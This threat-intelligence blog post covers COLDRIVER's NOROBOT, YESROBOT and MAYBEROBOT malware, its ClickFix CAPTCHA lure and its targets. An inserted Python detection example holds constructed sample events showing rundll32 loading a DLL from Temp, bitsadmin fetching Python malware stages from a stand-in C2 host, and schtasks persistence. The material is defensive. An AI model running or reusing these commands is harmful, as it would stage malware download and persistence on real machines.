COLDRIVER Updates Its Arsenal

Written by The Hivemind | Oct 31, 2025 6:15:39 PM

Verticals Targeted: NGOs, Policy Advisors, Dissidents
Regions Targeted: Not Specified
Related Families: LOSTKEYS, COLDCOPY, YESROBOT, MAYBEROBOT

Executive Summary

Industry researchers have identified new malware families, including NOROBOT, YESROBOT, and MAYBEROBOT, deployed by the Russian state-sponsored group COLDRIVER, targeting high-value individuals in NGOs, policy advisors, and dissidents. This rapid retooling, observed after the May 2025 disclosure of LOSTKEYS, showcases COLDRIVER’s evolving tactics to evade detection while maintaining aggressive intelligence collection.

Key Takeaways

  • COLDRIVER replaced LOSTKEYS with NOROBOT, a malicious DLL delivered via a “ClickFix” lure, executed through rundll32.
  • YESROBOT, a Python-based backdoor, was briefly used but replaced by the more flexible PowerShell-based MAYBEROBOT.
  • NOROBOT’s infection chain evolved to include complex cryptography and simplified delivery mechanisms, complicating tracking efforts.
  • MAYBEROBOT’s extensible protocol enhances COLDRIVER’s operational flexibility, targeting high-value individuals.

The Activity

Following the public disclosure of the LOSTKEYS malware in May 2025, the Russian state-sponsored group COLDRIVER rapidly shifted to deploying new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. This transition, observed within five days of the disclosure, highlights COLDRIVER’s accelerated development tempo and focus on evading detection while targeting high-value individuals in NGOs, policy advisors, and dissidents. Google Threat Intelligence Group recently reported on this activity.

The infection chain begins with a refined version of the COLDCOPY “ClickFix” lure, a deceptive tactic posing as a CAPTCHA verification to trick users into executing a malicious DLL named “iamnotarobot.dll” via rundll32. Unlike LOSTKEYS, which relied on multi-stage PowerShell scripts, this updated delivery method enhances efficiency. The lure incorporates text like “humanCheck” to reinforce the CAPTCHA disguise, aligning with the ROBOT-themed naming of the malware families.

NOROBOT, first observed in May 2025, serves as the initial downloader, retrieving subsequent stages from a hardcoded command-and-control (C2) server. Early versions fetched a self-extracting RAR containing a Python 3.8 installation for Windows, stored cryptographic keys in the registry, and established persistence via scheduled tasks. Files like `libsystemhealthcheck.py` and `libcryptopydatasize.py` were downloaded using bitsadmin, with the former containing part of an AES key to decrypt the latter, identified as YESROBOT.

YESROBOT, a Python-based backdoor, communicates via HTTPS to a C2 server, encoding system information in the User-Agent header. Its reliance on valid Python commands for functionality limited its extensibility, leading to its brief deployment in late May 2025. COLDRIVER quickly pivoted to MAYBEROBOT, a PowerShell-based backdoor observed in June 2025. MAYBEROBOT, fetched via a simplified NOROBOT variant, supports three commands: downloading and executing files from a URL, running cmd.exe commands, and executing PowerShell blocks. Its extensible protocol and lack of dependency on a Python installation make it more effective for sustained operations.
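As an added detection example (not code from the report or from PolySwarm), the following Python correlates constructed Windows process-creation events against the chain described above: rundll32 loading a DLL from a user-writable path, bitsadmin fetching .py stages, and scheduled-task creation pointing into a user profile. The sample events, hostnames, C2 hostname, task name and the 10-minute correlation window are constructed assumptions, and schtasks.exe as the persistence mechanism is assumed, since the report only says "scheduled tasks".

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry).
# Fields: timestamp|host|parent_image|image|command_line
SAMPLE_EVENTS = """\
2025-06-02T09:14:03|WS01|explorer.exe|rundll32.exe|rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\iamnotarobot.dll,#1
2025-06-02T09:14:09|WS01|rundll32.exe|bitsadmin.exe|bitsadmin /transfer hc /download http://c2.invalid/libsystemhealthcheck.py C:\\Users\\alice\\AppData\\Roaming\\libsystemhealthcheck.py
2025-06-02T09:14:12|WS01|rundll32.exe|bitsadmin.exe|bitsadmin /transfer ds /download http://c2.invalid/libcryptopydatasize.py C:\\Users\\alice\\AppData\\Roaming\\libcryptopydatasize.py
2025-06-02T09:15:40|WS01|rundll32.exe|schtasks.exe|schtasks /create /sc minute /mo 10 /tn HealthCheck /tr C:\\Users\\alice\\AppData\\Roaming\\python.exe
2025-06-02T10:02:11|WS02|explorer.exe|rundll32.exe|rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL
2025-06-02T10:05:00|WS02|svchost.exe|bitsadmin.exe|bitsadmin /transfer wu /download http://update.example/patch.msu C:\\Windows\\Temp\\patch.msu
"""

USER_PATH = re.compile(r"\\(users|appdata|temp)\\", re.I)  # user-writable locations
PY_FILE = re.compile(r"\.py(\s|$)")                         # a .py file in the command line
WINDOW = timedelta(minutes=10)                               # assumed correlation window

def classify(image, cmd):
    """Map one event to a stage of the chain described in the report, or None."""
    image, low = image.lower(), cmd.lower()
    if image == "rundll32.exe" and ".dll" in low and USER_PATH.search(low):
        return "rundll32_userpath_dll"         # ClickFix lure: iamnotarobot.dll via rundll32
    if image == "bitsadmin.exe" and "/download" in low and PY_FILE.search(low):
        return "bitsadmin_python_download"     # NOROBOT fetching .py stages with bitsadmin
    if image == "schtasks.exe" and "/create" in low and USER_PATH.search(low):
        return "schtask_userpath_persistence"  # scheduled-task persistence (assumed schtasks.exe)
    return None

def detect_chain(text, min_stages=2):
    """Return {host: sorted stages} for hosts showing >= min_stages distinct
    chain stages inside one WINDOW; a single stage alone does not alert."""
    hits = defaultdict(list)
    for line in text.strip().splitlines():
        ts, host, _parent, image, cmd = line.split("|", 4)
        stage = classify(image, cmd)
        if stage:
            hits[host].append((datetime.fromisoformat(ts), stage))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        for t0, _ in seq:
            stages = {s for t, s in seq if t0 <= t <= t0 + WINDOW}
            if len(stages) >= min_stages:
                alerts[host] = sorted(stages)
                break
    return alerts
```

WS02's benign rundll32 (System32 DLL) and bitsadmin (.msu, not .py) events show why each stage is path- and file-type-qualified and why at least two stages are required before alerting.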

COLDRIVER’s ongoing refinements to NOROBOT, observed through September 2025, include rotating infrastructure, altering file names, and reintroducing complex cryptographic key splitting to hinder analysis. While MAYBEROBOT has remained stable, its minimal built-in functionality requires operators to supply complex commands, balancing flexibility with operational complexity. This evolution underscores COLDRIVER’s focus on evading detection while targeting high-value individuals for intelligence collection.

Who is COLDRIVER?

COLDRIVER, also known as UNC4057, Star Blizzard, and Callisto, is a Russian state-sponsored advanced persistent threat (APT) group specializing in cyber espionage. Active since at least 2017, the group conducts highly targeted operations aligned with Russian government interests, particularly those of the Federal Security Service (FSB). Their campaigns focus on intelligence collection through credential theft and network infiltration, often evading detection with evolving tools.

COLDRIVER employs sophisticated social engineering tactics, creating impersonation accounts on social media and professional platforms to build rapport with victims before delivering phishing lures. These lures include benign PDFs disguised as op-eds or articles requesting feedback, which contain links to credential-harvesting pages or malicious downloads. The group has recently expanded to deploy lightweight malware, such as the LOSTKEYS platform, which uses ClickFix CAPTCHA-style lures to trick users into executing malicious files. Once infected, backdoors like MAYBEROBOT enable persistent remote access, command execution, payload downloads, and data exfiltration. They leverage webmail services for initial outreach and cloud storage for hosting phishing content, enhancing evasion of traditional defenses.

The group primarily targets high-profile individuals and organizations in Western-aligned entities, including NATO governments, non-governmental organizations (NGOs), former intelligence and military officials, think tanks, journalists, and academic institutions. Geographically, operations span Europe, North America, and select Asia-Pacific regions. Sectors of interest include government agencies, defense, media, and education, with an emphasis on entities critical to geopolitical tensions, such as those supporting Ukraine or countering Russian influence. COLDRIVER's direct ties to the FSB underscore its role as a Kremlin-backed espionage arm, prioritizing surveillance over disruption to advance Russian national security objectives. This alignment has been evidenced through consistent targeting patterns and technical overlaps with other Russian APTs. 

IOCs

PolySwarm has multiple samples associated with this activity.


You can use the following CLI command to search for all COLDRIVER samples in our portal:

$ polyswarm link list -f COLDRIVER
